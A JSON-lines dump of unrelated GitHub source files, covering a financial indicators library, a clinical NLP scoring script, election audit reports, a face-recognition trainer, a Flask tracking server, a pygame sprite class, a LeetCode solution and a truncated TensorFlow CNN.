db.close()\n","repo_name":"McMmie/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25238741480","text":"from collections import OrderedDict\nimport pandas as pd\nimport os\nimport sys\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\n\nfrom scoring.scoring import summarize_event_df, summarize_event_csvs\nimport config.constants as C\r\nfrom scoring.scoring import score_brat\r\n\n\r\nbrat_true = '/home/lybarger/sdoh_challenge/analyses/step110_extraction/train/e10_d2/brat_true/'\r\nbrat_predict = '/home/lybarger/sdoh_challenge/analyses/step110_extraction/train/e10_d2/brat_predict/'\r\ndestination = '/home/lybarger/sdoh_challenge/analyses/step110_extraction/train/e10_d2/temp/'\r\n\r\nf1 = '/home/lybarger/sdoh_challenge/analyses/step110_extraction/train/e10_d2/temp/scores_strict.csv'\r\nf2 = '/home/lybarger/sdoh_challenge/analyses/step110_extraction/train/e10_d2/temp/scores_relaxed_trig_overlap.csv'\r\nf3 = '/home/lybarger/sdoh_challenge/analyses/step110_extraction/train/e10_d2/temp/scores_relaxed_trig_min_dist.csv'\r\nf4 = '/home/lybarger/sdoh_challenge/analyses/step110_extraction/train/e10_d2/temp/scores_relaxed_all.csv'\r\nf5 = '/home/lybarger/sdoh_challenge/analyses/step110_extraction/train/e10_d2/temp/scores_relaxed_partial.csv'\r\nlabeled_args = [C.STATUS_TIME, C.TYPE_LIVING, C.STATUS_EMPLOY]\r\n\r\nscoring_defs = [ \\\r\n dict( \\\r\n score_trig = C.EXACT,\r\n score_span = C.EXACT,\r\n score_labeled = C.LABEL,\r\n description = 'strict'),\r\n dict( \\\r\n score_trig = C.OVERLAP,\r\n score_span = C.EXACT,\r\n score_labeled = C.LABEL,\r\n description = 'relaxed_trig_overlap'),\r\n dict( \\\r\n score_trig = C.MIN_DIST,\r\n score_span = C.EXACT,\r\n score_labeled = C.LABEL,\r\n description = 'relaxed_trig_min_dist'),\r\n dict( \\\r\n score_trig = C.MIN_DIST,\r\n score_span = C.OVERLAP,\r\n score_labeled = C.LABEL,\r\n description = 'relaxed_all'),\r\n dict( \\\r\n score_trig = C.MIN_DIST,\r\n score_span = C.PARTIAL,\r\n score_labeled = C.LABEL,\r\n description = 'relaxed_partial'),\r\n]\r\n\r\nfor scoring_def in scoring_defs:\r\n df = score_brat(brat_true, brat_predict, \\\r\n labeled_args = labeled_args,\r\n path = destination,\r\n **scoring_def)\r\n\r\n\r\n\nd = OrderedDict([('strict', f1), ('relaxed_trig_overlap', f2), ('relaxed_trig_min_dist', f3), ('relaxed_all', f4), ('relaxed_partial', f5)])\n\r\n\ndf = summarize_event_csvs(d)\r\nprint(df)\r\n","repo_name":"Lybarger/sdoh_extraction","sub_path":"sandbox/summarize_score_df.py","file_name":"summarize_score_df.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"81"} +{"seq_id":"33323824487","text":"\"\"\" Common algorithms usable on tables\n\"\"\"\nimport math\nimport builtins\nimport bisect\nfrom collections import deque\n\nfrom fin.utils.log import console\nfrom fin.seq.column import Column, get_column_name\n\nfrom fin.seq.algox import *\n\n# ======================================================================\n# Adapters\n# ======================================================================\ndef by_row(fct):\n \"\"\"\n Evaluates a function row by row on a list of columns.\n \"\"\"\n def _by_row(rowcount, *cols):\n result = [None]*rowcount\n i = 0\n rows = zip(*cols)\n while i < rowcount:\n row = next(rows)\n try:\n result[i] = fct(*row)\n except Exception as e:\n result[i] = str(e) # ???\n pass\n i += 1\n\n return Column(None,result)\n\n return _by_row\n\n# ======================================================================\n# Accumulator\n# ======================================================================\ndef acc(value, neg=False, pos=True):\n \"\"\"\n Increase the running value when pos is true, decrease it when neg is true.\n \"\"\"\n def _acc(rowcount, value, neg, pos):\n result = [None]*rowcount\n a = 0.0\n\n for i, (vi, ni, pi) in enumerate(zip(value, neg, pos)):\n if pi:\n a += vi\n if ni:\n a -= vi\n\n result[i] = a\n\n return result\n\n return (_acc, value, neg, pos)\n\ndef acc2(value, buy, sell):\n \"\"\"\n Simulate an investor that can buy and sell one share.\n\n The investor can only sell when it owns a share.\n \"\"\"\n def _acc(rowcount, value, buy, sell):\n result = [None]*rowcount\n share = 0\n cash = 0\n a = 0\n\n for i, (v, b, s) in enumerate(zip(value, buy, sell)):\n if b and not share:\n share = 1\n cash -= v\n if s and share:\n share = 0\n cash += v\n\n result[i] = share*v+cash\n\n return result\n\n return (_acc, value, buy, sell)\n\n# ======================================================================\n# Window functions\n# ======================================================================\ndef window(fct, n):\n def _window(rowcount, *cols):\n i = n-1\n result = [None]*rowcount\n while i < rowcount:\n result[i] = fct(i-n+1, i+1, *cols)\n i += 1\n\n return Column(None, result)\n\n return _window\n\ndef naive_window(fct, n):\n def _fct(start, end, *cols):\n return fct(*[col[start:end] for col in cols])\n\n return window(_fct, n)\n\n# ======================================================================\n# Stats\n# ======================================================================\ndef standard_deviation(n):\n \"\"\"\n Compute the Standard Deviation over a n-period window.\n \"\"\"\n var = variance(n)\n sqrt = math.sqrt\n\n def s(rowcount, values):\n va = var(rowcount, values)\n result = []\n push = result.append\n\n for v in va:\n push(None if v is None else sqrt(v))\n\n return Column(f\"STDDEV({n}), {get_column_name(values)}\", result)\n return s\n\ndef variance(n):\n \"\"\"\n Compute the Variance over a n-period window.\n \"\"\"\n a = 1.0/(n-1.0)\n b = a/n\n\n def s(rowcount, values):\n sigma_ui = 0.0\n sigma_ui2 = 0.0\n buffer = [None]*n\n nones = n\n ptr = 0\n result = []\n push = result.append\n\n for i, v in enumerate(values):\n x = buffer[ptr]\n\n try:\n sigma_ui -= x\n sigma_ui2 -= x*x\n except TypeError:\n nones -= 1\n\n buffer[ptr] = v\n ptr += 1\n if ptr == n:\n ptr = 0\n\n try:\n sigma_ui += v\n sigma_ui2 += v*v\n except TypeError:\n nones += 1\n\n push(None if nones else a*sigma_ui2 - b*sigma_ui*sigma_ui)\n\n return result\n return s\n\ndef correlation(n):\n \"\"\"\n Compute the Linear correlation between two columns over a n-period window.\n \"\"\"\n sqrt = math.sqrt\n\n def _correlation(col_x, col_y):\n try:\n x_bar = sum(col_x)/n\n y_bar = sum(col_y)/n\n except TypeError:\n return None\n\n covar = [(x-x_bar)*(y-y_bar) for x, y in zip(col_x, col_y)]\n x_minus_x_bar = [(x-x_bar)**2 for x in col_x]\n y_minus_y_bar = [(y-y_bar)**2 for y in col_y]\n return sum(covar)/(sqrt(sum(x_minus_x_bar))*sqrt(sum(y_minus_y_bar)))\n return naive_window(_correlation, n)\n\ndef volatility(n, tau=1/252):\n \"\"\"\n Compute the Annualized Historical Volatility over a n-period window.\n\n In practice this is the standard deviation of the day-to-day return.\n\n Parameters:\n n: the number of periods in the window. Often 20 or 21 for dayly data\n (corresponding to the number of trading days in one month)\n tau: inverse of the number of periods in one year\n \"\"\"\n stddev = standard_deviation(n)\n log = math.log\n k = math.sqrt(1/tau)\n vol = lambda stddev : stddev*k\n\n def _volatility(rowcount, values):\n # 1. Continuously compounded return for each period\n ui = map_change(lambda curr, prev: log(curr/prev))(rowcount, values)\n # 2. Standard deviation\n result = stddev(rowcount, ui)\n # 3. Annualized values\n return map(vol)(rowcount, result)\n\n return _volatility\n\ndef basic_sharpe_ratio(n):\n \"\"\"\n Compute the Sharpe Ratio ignoring risk free return over a n-period window.\n \"\"\"\n stddev = standard_deviation(n)\n\n def _basic_sharpe_ratio(rowcount, values):\n s = iter(stddev(rowcount, values))\n result = [None]*(n-1)\n push = result.append\n\n i = iter(values)\n for _, _, _ in zip(range(n-1), i, s):\n pass\n\n j = iter(values)\n for x_i, x_j, s_i in zip(i, j, s):\n try:\n ret = (x_i - x_j) # TODO replace by average daily return\n push(ret/s_i)\n except TypeError:\n push(None)\n\n return Column(f\"BSHARPE({n}), {get_column_name(values)}\", result)\n\n\n return _basic_sharpe_ratio\n\ndef best_fit(rowcount, col_x, col_y):\n \"\"\"\n Compute the Linear Best Fit over the full dataset.\n \"\"\"\n tx = []\n ty = []\n for x, y in zip(col_x, col_y):\n if x is not None and y is not None:\n tx.append(x)\n ty.append(y)\n\n x_bar = sum(tx)/len(tx)\n y_bar = sum(ty)/len(ty)\n\n covar = var = 0.0\n for x, y in zip(tx, ty):\n x_minus_x_bar = x-x_bar\n y_minus_y_bar = y-y_bar\n covar += x_minus_x_bar*y_minus_y_bar\n var += x_minus_x_bar*x_minus_x_bar\n\n beta = covar/var\n alpha = y_bar-x_bar*beta\n\n result = [None]*rowcount\n for i, x, in enumerate(col_x):\n try:\n result[i] = alpha+beta*x\n except TypeError:\n pass\n\n return Column(f\"BESTFIT, {get_column_name(col_y)}:{get_column_name(col_x)}\", result)\n\n\n# ======================================================================\n# Greeks\n# ======================================================================\ndef delta(n=1):\n \"\"\"\n Compute the Rate Of Change of a series over a period of time.\n\n Formally, y_i = x_i - x_(i-n).\n \"\"\"\n def _delta(rowcount, x):\n #\n # According to timeit, this is the fastest algorithm I could find\n #\n result = []\n store = result.append\n it = iter(x)\n jt = iter(x)\n\n # Consume the n first items\n for _ in range(n):\n store(None)\n next(it)\n\n # Remaining of the list\n for i, j in zip(it, jt):\n try:\n store(i-j)\n except TypeError:\n store(None)\n\n return result\n\n return _delta\n\ndef beta(n):\n \"\"\"\n Compute the Beta between two columns over a n-period window.\n \"\"\"\n def _beta(col_x, col_y):\n try:\n x_bar = sum(col_x)/n\n y_bar = sum(col_y)/n\n except TypeError:\n return None\n\n covar = [(x-x_bar)*(y-y_bar) for x, y in zip(col_x, col_y)]\n var = [(x-x_bar)**2 for x in col_x]\n return sum(covar)/sum(var)\n return naive_window(_beta, n)\n\ndef alpha(n):\n \"\"\"\n Compute the Alpha between two columns over a n-period window.\n \"\"\"\n def _alpha(col_x, col_y):\n try:\n x_bar = sum(col_x)/n\n y_bar = sum(col_y)/n\n except TypeError:\n return None\n\n covar = [(x-x_bar)*(y-y_bar) for x, y in zip(col_x, col_y)]\n var = [(x-x_bar)**2 for x in col_x]\n return y_bar - x_bar*sum(covar)/sum(var)\n return naive_window(_alpha, n)\n\n\n# ======================================================================\n# Indicators\n# ======================================================================\ndef basing_point_bull(low, high):\n \"\"\"\n Magee's Basing Point in a bull market as explained in \"Technical Analysis\n for Stocks Trends, 11th Edition\" p365.\n\n This indicator will find Minor Bottoms from a (low, close) price pair.\n \"\"\"\n def _basing_point_bull(rowcount, low, high):\n MINUS_INF = float(\"-inf\")\n result = []\n push = result.append\n it = zip(range(rowcount), low, high)\n current = None\n highest = MINUS_INF\n n = 0\n\n for i, l, h in it:\n if l is None or h is None:\n push(current)\n continue\n if h > highest:\n # Possible new high\n high_day_of_the_lowest = highest = h\n lowest = l\n n = 0\n elif l < lowest:\n # Possible new low\n lowest = l\n high_day_of_the_lowest = h\n n = 0\n elif l > high_day_of_the_lowest:\n # One periode completly outside the lowest day\n n += 1\n\n if n > 2:\n # New Basing Point found. Reset.\n current = lowest\n highest = MINUS_INF\n\n push(current)\n\n return result\n\n return _basing_point_bull, low, high\n\ndef basing_point_bear(low, high):\n \"\"\"\n Magee's Basing Point in a bear market as explained in \"Technical Analysis\n for Stocks Trends, 11th Edition\" p365.\n\n This indicator will find Minor Tops from a (low, close) price pair.\n \"\"\"\n def _basing_point_bear(rowcount, low, high):\n PLUS_INF = float(\"inf\")\n result = []\n push = result.append\n it = zip(range(rowcount), low, high)\n current = None\n lowest = PLUS_INF\n n = 0\n\n for i, l, h in it:\n if l is None or h is None:\n push(current)\n continue\n if l < lowest:\n # Possible new low\n low_day_of_the_highest = lowest = l\n highest = h\n n = 0\n elif h > highest:\n # Possible new low\n highest = h\n low_day_of_the_highest = l\n n = 0\n elif h < low_day_of_the_highest:\n # One periode completly outside the highest day\n n += 1\n\n if n > 2:\n # New Basing Point found. Reset.\n current = highest\n lowest = PLUS_INF\n\n push(current)\n\n return result\n\n return _basing_point_bear, low, high\n\n# ======================================================================\n# Core functions\n# ======================================================================\ndef constantly(value):\n \"\"\"\n Evaluates to a list made of contant values.\n \"\"\"\n def _constantly(rowcount):\n return [value]*rowcount\n\n return _constantly\n\ndef shift(n):\n \"\"\"\n Shift a column by n periods.\n\n Sometimes called the \"lag\" operator.\n \"\"\"\n def _shift(rowcount, values):\n if n > 0:\n return values[n:] + [None]*n\n else:\n return [None]*-n + values[:n]\n\n return _shift\n\ndef min(n):\n \"\"\"\n Sliding minimum over a n-periods window.\n \"\"\"\n assert n > 0\n def _min(rowcount, values):\n result = []\n store = result.append\n queue = deque()\n popleft = queue.popleft\n pushright = queue.append\n cooldown = n-1\n\n for value in values:\n try:\n while len(queue) >= n:\n popleft()\n while len(queue) and queue[0] > value:\n popleft()\n pushright(value)\n except TypeError:\n cooldown = n\n\n if cooldown:\n store(None)\n cooldown -= 1\n else:\n store(queue[0])\n\n return result\n\n return _min\n\ndef max(n):\n \"\"\"\n Sliding maximum over a n-periods window.\n \"\"\"\n assert n > 0\n def _max(rowcount, values):\n result = []\n store = result.append\n queue = deque()\n popleft = queue.popleft\n pushright = queue.append\n cooldown = n-1\n\n for value in values:\n try:\n while len(queue) >= n:\n popleft()\n while len(queue) and queue[0] < value:\n popleft()\n pushright(value)\n except TypeError:\n cooldown = n\n\n if cooldown:\n store(None)\n cooldown -= 1\n else:\n store(queue[0])\n\n return result\n\n return _max\n\ndef ratio_old(rowcount, a, b):\n \"\"\"\n Evaluates to the line-by-line ratio of two columns.\n\n Formally, y_i = to a_i/b_i.\n \"\"\"\n result = [None]*rowcount\n for idx, a_i, b_i in zip(range(rowcount), a, b):\n try:\n result[idx] = a_i/b_i\n except TypeError:\n # One value is probably None\n pass\n except ZeroDivisionError:\n # b_i is 0.0\n result[idx] = float(\"inf\") if a_i > 0 else float(\"-inf\") if a_i < 0 else None\n\n return Column(f\"{get_column_name(a)}/{get_column_name(b)}\", result)\n\n# ======================================================================\n# Compound functions\n# ======================================================================\ndef ratio_to_moving_average(n):\n ma = sma(n)\n\n def _ratio_to_moving_average(rowcount, a):\n b = ma(rowcount, a)\n return ratio(rowcount, a, b)\n\n return _ratio_to_moving_average\n\n# ======================================================================\n# Projections\n# ======================================================================\ndef map(fct):\n \"\"\"\n Map data using a user-provided function.\n\n Handle None gracefully (as opposed to `builtins.map`)\n\n Formally, y_i = f(u_i)\n \"\"\"\n def _map(rowcount, values):\n return Column(None, [fct(x) if x is not None else None for x in values])\n\n return _map\n\ndef mapn(fct):\n \"\"\"\n Map data using y_i = f(u_i0 .. u_in)\n \"\"\"\n def _mapn(rowcount, *values):\n result = []\n push = result.append\n for i, row in enumerate(zip(*values)):\n try:\n push(fct(*row))\n except TypeError:\n push(None)\n\n return result\n\n return _mapn\n\ndef map_change(fct):\n \"\"\"\n Map data using y_i = f(u_i, u_i-1)\n \"\"\"\n def _map(rowcount, values):\n result = [None]*rowcount\n prev = None\n\n for i, x in enumerate(values):\n if x is not None and prev is not None:\n result[i] = fct(x, prev)\n\n prev = x\n\n return result\n\n return _map\n\ndef _index(col, x, *, bsearch=bisect.bisect_left):\n \"\"\"\n Return the index of x in col, assuming col is sorted is ascending order.\n \"\"\"\n idx = bsearch(col, x)\n if idx == len(col) or col[idx] != x:\n raise ValueError\n\n return idx\n\ndef line(x1, x2):\n \"\"\"\n Compute the line passing by (x1, y1_x1) and (x2, y2_x2).\n \"\"\"\n def _line(rowcount, x_col, y1_col, y2_col=None):\n if y2_col is None:\n y2_col = y1_col\n\n x1_idx = _index(x_col, x1)\n x2_idx = _index(x_col, x2)\n y1 = y1_col[x1_idx]\n y2 = y2_col[x2_idx]\n\n if y1 is None or y2 is None:\n return [None]*rowcount\n\n # y = a+bx\n b = (y2-y1)/(x2_idx-x1_idx)\n a = y1-b*x1_idx\n result = []\n push = result.append\n\n for i in range(rowcount):\n push(a+b*i)\n\n return result\n\n return _line\n\n# ======================================================================\n# Calendar functions\n# ======================================================================\nimport fin.seq.table\nfrom fin import datetime\n\ndef shift_date(delta):\n \"\"\"\n Offset a calendar date.\n \"\"\"\n offset = datetime.asCalendarDateDelta(delta)\n\n def _shift_date(rowcount, dates):\n name = getattr(dates, \"name\", None)\n\n result = [None]*rowcount\n for idx, date in enumerate(dates):\n try:\n result[idx] = date+offset\n except ValueError:\n pass\n\n return fin.seq.table.Column(name,result)\n\n return _shift_date\n\ndef hist2(f, n, interval):\n \"\"\"\n Apply a function to data et recuring intervals\n \"\"\"\n assert interval > 0\n def _hist(rowcount, data):\n result = [None]*rowcount\n for i, value in enumerate(data):\n if i < interval:\n result[i] = []\n else:\n result[i] = [value] + result[i-interval][:n]\n\n result = builtins.map(f, result)\n return result\n\n return _hist\n\ndef hist(f, n, years=0, months=0, days=0):\n \"\"\"\n Apply a function to data at recuring intervals.\n \"\"\"\n offset = datetime.CalendarDateDelta(years, months, days)\n def _hist(rowcount, dates, data):\n # First, build an index from date to row number:\n index = { date: idx for idx, date in enumerate(dates) }\n\n # Then build a mapping from one date to the preceeding period.\n translation = {}\n previous = None\n for date in dates:\n print(date, offset, date+offset, date+offset in index)\n try:\n other = date+offset\n except ValueError:\n continue\n\n # Map a date to its preceeding period if it exists,\n # else, use the closest matching date\n if other in index:\n translation[date] = other\n previous = other\n else:\n translation[date] = previous\n print(translation)\n\n # Now, for each date, build a vector of the values at recuring intervals\n result = [None]*rowcount\n for i, date in enumerate(dates):\n print(date, end=' ')\n v = []\n for j in range(n):\n idx = index.get(date, None)\n v.append(data[idx] if idx is not None else None)\n date = translation.get(date, None)\n if date is None:\n break\n result[i] = f(v)\n print()\n\n return result\n\n return _hist\n","repo_name":"s-leroux/fin","sub_path":"fin/seq/algo.py","file_name":"algo.py","file_ext":"py","file_size_in_byte":19328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72353017225","text":"#Place to put my analyses for now\nimport auditLog\nimport ballotImage\nimport dateMod\nimport datetime\nimport dateutil.parser\nimport report\n\ndef datesUnset(dateclass, ballotclass):\n r = report.Report()\n t1 = report.Table()\n t2 = report.Table()\n \n r.addTitle('Incorrectly Set Dates')\n\n if not (len(dateclass.D1) or len(dateclass.D2)):\n r.addTextBox('No dates were found to be incorrectly set after being opened for elections')\n else:\n precinctMap = ballotclass.getPrecinctNameMap()\n d = {}\n\n r.addTextBox('These machines have been identified as having incorrectly set clocks. Having invalid clocks can preclude further log analysis. The results have been catagorized into two tables')\n\n r.addTextBox('

Table 1: Precincts Manually Adjusted During Elections')\n if len(dateclass.D1) == 0:\n r.addTextBox('No machines found.')\n else:\n r.addTextBox('List of machines by precinct with manual time adjustments during election day and after being opened for voting

')\n t1.addHeader('Precinct')\n t1.addHeader('# of Machines')\n\n for k in dateclass.D1.keys():\n if k in precinctMap:\n key = precinctMap[k]\n elif k in ballotclass.getEarlyVotingList():\n key = 'Absentee'\n elif k in ballotclass.getFailsafeList():\n key = 'Failsafe'\n else:\n key = k\n\n if key in d:\n d[key] = d[key] + 1\n else:\n d.update({key:1})\n for k,v in d.iteritems():\n t1.addRow([k, str(v)])\n\n r.addTable(t1)\n\n if len(dateclass.D2) != 0:\n r.addTextBox('

Table 2: Machines never set correctly')\n r.addTextBox('List of machines that conducted election day voting start to finish with an incorrect clock.

')\n t2.addHeader('Serial #')\n t2.addHeader('Open Date')\n t2.addHeader('Close Date')\n for k,v in dateclass.D2.iteritems():\n t2.addRow([str(k), str(v[0]), str(v[1])])\n\n r.addTable(t2)\n else:\n r.addTextBox('No machines found.')\n\n return r \n\ndef dateErrors(dateclass, ballotclass):\n r = report.Report()\n t = report.Table()\n \n r.addTitle('Datetime Errors')\n\n if len(dateclass.D3) == 0:\n r.addTextBox('No date errors found')\n else:\n r.addTextBox('List machines with detected date anomalies. Includes last known \"good\" event as well as what event was determined to be the error and how many following events it affected.')\n t.addHeader('Machine')\n t.addHeader('Last Event')\n t.addHeader('Anomalous Event')\n t.addHeader('Occurances')\n for k,v in dateclass.D3.iteritems():\n t.addRow([k, str(v[0]), str(v[1]), str(v[2])])\n\n r.addTable(t)\n\n return r \n","repo_name":"davidwagner/audit-bear","sub_path":"web2py/applications/audit_bear/modules/myanalyses.py","file_name":"myanalyses.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"73048471946","text":"import cv2\nimport os\nimport sys\nimport numpy as np\nfrom PIL import Image\n\ndef getImagesAndLabels(path):\n\timage_paths = [os.path.join(path,f) for f in os.listdir(path)]\n\timages = []\n\tlabels = []\n\tfor image_path in image_paths:\n\t\timage_pillow = Image.open(image_path).convert('L')\n\t\timage_np = np.array(image_pillow,'uint8')\n\t\tlabel = int(os.path.split(image_path)[1].split(\".\")[0])\n\t\tfaces = detector.detectMultiScale(image_np)\n\t\t# faces = faceCascade.detectMultiScale(image)\n\t\t# for (x,y,w,h) in faces:\n\t\t\t# images.append(image_np[y:y+h,x:x+w])\n\t\t\t# labels.append(label)\n\t\tlabels.append(label)\n\t\timages.append(image_np)\n\treturn images, labels\n\nif __name__ == '__main__':\n\trecognizer = cv2.face.LBPHFaceRecognizer_create()\n\tdetector = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n\n\tfaces, labels = getImagesAndLabels(\"dataset/TrainingSet\")\n\trecognizer.train(faces, np.array(labels))\n\trecognizer.write('trainer/trainer.yml')","repo_name":"jingtalabucon/SpecialProblem","sub_path":"face_recog.py","file_name":"face_recog.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5703009312","text":"from flask import render_template, Flask, redirect, jsonify\nfrom flask_restful import reqparse\nimport redis\nfrom os import environ as config\nimport pickle\n\napp = Flask(__name__)\n\ncache = redis.StrictRedis(host=config['REDIS_HOST'], port=int(config['REDIS_PORT']), db=0)\n\n@app.route('/tracking//', methods=['GET'])\ndef serve_tracking_page(tracking_id):\n\tcontext = {}\n\tcontext['tracking_id'] = tracking_id\n\n\tif cache.exists('tracking:'+tracking_id):\n\t\treturn render_template('track.html', **context)\n\telse:\n\t\treturn redirect('/static/inactive.html')\n\n@app.route('/tracking/pin/verify/', methods=['POST'])\ndef verify_pin():\n\t\tparser = reqparse.RequestParser()\n\t\tparser.add_argument('trackingId', type=str)\n\t\tparser.add_argument('pin', type=str)\n\n\t\targs = parser.parse_args(strict=True)\n\n\t\tt = cache.get('tracking:'+args['trackingId'])\n\t\tif t == None:\n\t\t\treturn jsonify(error='Tracking ID inactive'), 400\n\n\t\tinfo = pickle.loads(t)\n\t\tif info['tracking_pin'] != args['pin']:\n\t\t\treturn jsonify(error='Tracking ID inactive'), 400\n\n\t\tinfo.pop('tracking_pin', None)\n\t\treturn jsonify(**info)\n\n\n\nif __name__ == '__main__':\n\tapp.run(debug=config['DEBUG']=='True', port=5001, host='0.0.0.0')\n","repo_name":"jcrumb/acro-backend","sub_path":"web-tracking/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29930298023","text":"\"\"\"\nFile containing the abstract definition of a sprite designed to be linked with a unit\n\"\"\"\n\nimport os\nfrom abc import ABCMeta, abstractmethod\nfrom copy import deepcopy\n\nimport pygame\nimport pygame.transform as transform\n\n__author__ = 'Anthony Rouneau'\n\n\nclass UnitSprite(pygame.sprite.Sprite, metaclass=ABCMeta):\n \"\"\"\n Abstract definition of a unit's sprite.\n \"\"\"\n\n def __init__(self, graphics: bool=True):\n \"\"\"\n Instantiates the sprite\n\n Args:\n graphics: True if this sprite must be drawn, False for testing and simulation purpose\n \"\"\"\n super().__init__()\n self.resFolder = os.path.join(\"res\", \"sprites\")\n img = None\n self.rect = None\n if graphics:\n location = os.path.join(os.curdir, self.imageRelativePath)\n img = pygame.image.load_extended(location) # type: pygame.Surface\n self.rect = img.get_rect() # type: pygame.Rect\n # img = img.convert_alpha()\n self.image = img\n\n def rotate(self, angle: float) -> None:\n \"\"\"\n Rotates this sprite\n\n Args:\n angle: The angle in degrees\n \"\"\"\n if self.image is not None and self.rect is not None:\n self.image = transform.rotate(self.image, angle)\n self.rect = self.image.get_rect() # type: pygame.Rect\n\n def size(self, width: int, height: int) -> None:\n \"\"\"\n Resize this sprite.\n\n Args:\n width: The new width\n height: The new height\n \"\"\"\n if self.image is not None and self.rect is not None:\n self.image = transform.scale(self.image, (width, height))\n (x, y) = self.rect.center\n self.rect = self.image.get_rect()\n self.rect.move_ip(x, y)\n\n @property\n @abstractmethod\n def imageRelativePath(self) -> str:\n \"\"\"\n Contains the relative path to the image of this sprite.\n \"\"\"\n pass\n\n def __deepcopy__(self, memo={}):\n cls = self.__class__\n result = cls.__new__(cls)\n memo[id(self)] = result\n for k, v in self.__dict__.items():\n if k != \"image\" and k != \"rect\":\n value = deepcopy(v, memo)\n else:\n value = None\n setattr(result, k, value)\n return result\n\n\n","repo_name":"Angeall/pyTGF","sub_path":"pytgf/characters/units/sprite.py","file_name":"sprite.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72929334986","text":"from typing import List\nfrom sys import setrecursionlimit\nsetrecursionlimit(10 ** 9)\n\n\nclass Solution:\n def permute(self, nums: List[int]) -> List[List[int]]:\n def dfs(perm):\n if len(perm) == len(nums):\n res.append(perm)\n return\n\n for num in nums:\n if num not in perm:\n dfs(perm + [num])\n\n res = []\n dfs([])\n\n return res\n\n\nprint(Solution().permute([1,2,3]))","repo_name":"boorooksus/Algorithm-Study","sub_path":"LeetCode/4회차/B34_Permutations2.py","file_name":"B34_Permutations2.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24750856180","text":"import tensorflow as tf\nimport numpy as np\nimport tensorflow.contrib.layers as layers\nimport tensorflow.contrib.tpu as tpu\n\ndef model_fn(features, labels, mode, params):\n def get_input(features, labels):\n input_x = tf.expand_dims(features, axis=-1)\n input_y = tf.squeeze(labels)\n\n return input_x, input_y\n\n def conv_net(x):\n initializer = tf.random_normal_initializer(stddev=0.01)\n with tf.name_scope(\"conv1\"):\n filter = tf.get_variable(\"filter-%s\" % 64, [5, 5, 1, 64],\n initializer=initializer)\n\n x = tf.nn.conv2d(x, filter=filter, strides=[1, 1, 1, 1], padding=\"SAME\")\n x = tf.nn.elu(x)\n x = tf.nn.max_pool(x, ksize=(1, 2, 2, 1), strides=[1, 2, 2, 1], padding='VALID')\n if mode==tf.estimator.ModeKeys.TRAIN:\n with tf.name_scope(\"drop_out\"):\n x = tf.nn.dropout(x, keep_prob=params.drop_out)\n\n with tf.name_scope(\"conv2\"):\n # conv\n filter = tf.get_variable(\"filter-%s\" % 128, [5, 5, 64, 128],\n initializer=initializer)\n x = tf.nn.conv2d(x, filter=filter, strides=[1, 1, 1, 1], padding=\"SAME\")\n x = tf.nn.elu(x)\n x = tf.nn.max_pool(x, ksize=(1, 2, 2, 1), strides=[1, 2, 2, 1], padding='VALID')\n if mode==tf.estimator.ModeKeys.TRAIN:\n with tf.name_scope(\"drop_out\"):\n x = tf.nn.dropout(x, keep_prob=params.drop_out)\n\n# with tf.name_scope(\"conv3\"):\n# # conv\n# filter = tf.get_variable(\"filter-%s\" % 258, [5, 5, 128, 258],\n# initializer=initializer)\n# x = tf.nn.conv2d(x, filter=filter, strides=[1, 1, 1, 1], padding=\"SAME\")\n# x = tf.nn.elu(x)\n# x = tf.nn.max_pool(x, ksize=(1, 2, 2, 1), strides=[1, 2, 2, 1], padding='VALID')\n# if mode==tf.estimator.ModeKeys.TRAIN:\n# with tf.name_scope(\"drop_out\"):\n# x = tf.nn.dropout(x, keep_prob=params.drop_out)\n\n return x\n\n def fullconnected(x):\n\n with tf.name_scope(\"full_connect1\"):\n x = tf.layers.dense(x, units=params.hidden_size, activation=\"elu\")\n if mode==tf.estimator.ModeKeys.TRAIN:\n with tf.name_scope(\"drop_out\"):\n x = tf.nn.dropout(x, keep_prob=params.drop_out)\n\n with tf.name_scope(\"full_connect2\"):\n logist = tf.layers.dense(x, units=params.num_class)\n\n return logist\n\n x, y = get_input(features, labels)\n x = tf.contrib.layers.batch_norm(x)\n x = conv_net(x)\n x = layers.flatten(x)\n\n logits = fullconnected(x)\n prediction = tf.argmax(logits, axis=1)\n cross_entropy = tf.reduce_mean(tf.losses.sparse_softmax_cross_entropy(labels=y, logits=logits))\n train_op = layers.optimize_loss(loss=cross_entropy,\n global_step=tf.train.get_global_step(),\n learning_rate=params.learning_rate,\n optimizer=\"Adam\",\n clip_gradients=params.clip_max,\n )\n return tf.estimator.EstimatorSpec(mode=mode,\n predictions={\"logits\": logits, \"prediction\": prediction},\n loss=cross_entropy,\n train_op=train_op,\n eval_metric_ops={\"accuracy\": tf.metrics.accuracy(labels, prediction)})\n\n\n# import tensorflow.contrib.training as train\n# train.HParams\n\ndef create_estimator_and_spec():\n model_param = tf.contrib.training.HParams(\n num_class=10,\n hidden_size=256,\n clip_max=5.0,\n drop_out=0.7,\n learning_rate=0.01,\n batch_size=128\n )\n run_config = tf.estimator.RunConfig(\n model_dir=\"./\",\n save_checkpoints_secs=300,\n save_summary_steps=100)\n\n estimator = tf.estimator.Estimator(\n model_fn=model_fn,\n config=run_config,\n params=model_param\n )\n\n return estimator\n\n\nif __name__=='__main__':\n\n estimator = create_estimator_and_spec()\n\n (x_train, y_train), (x_test, y_test) = 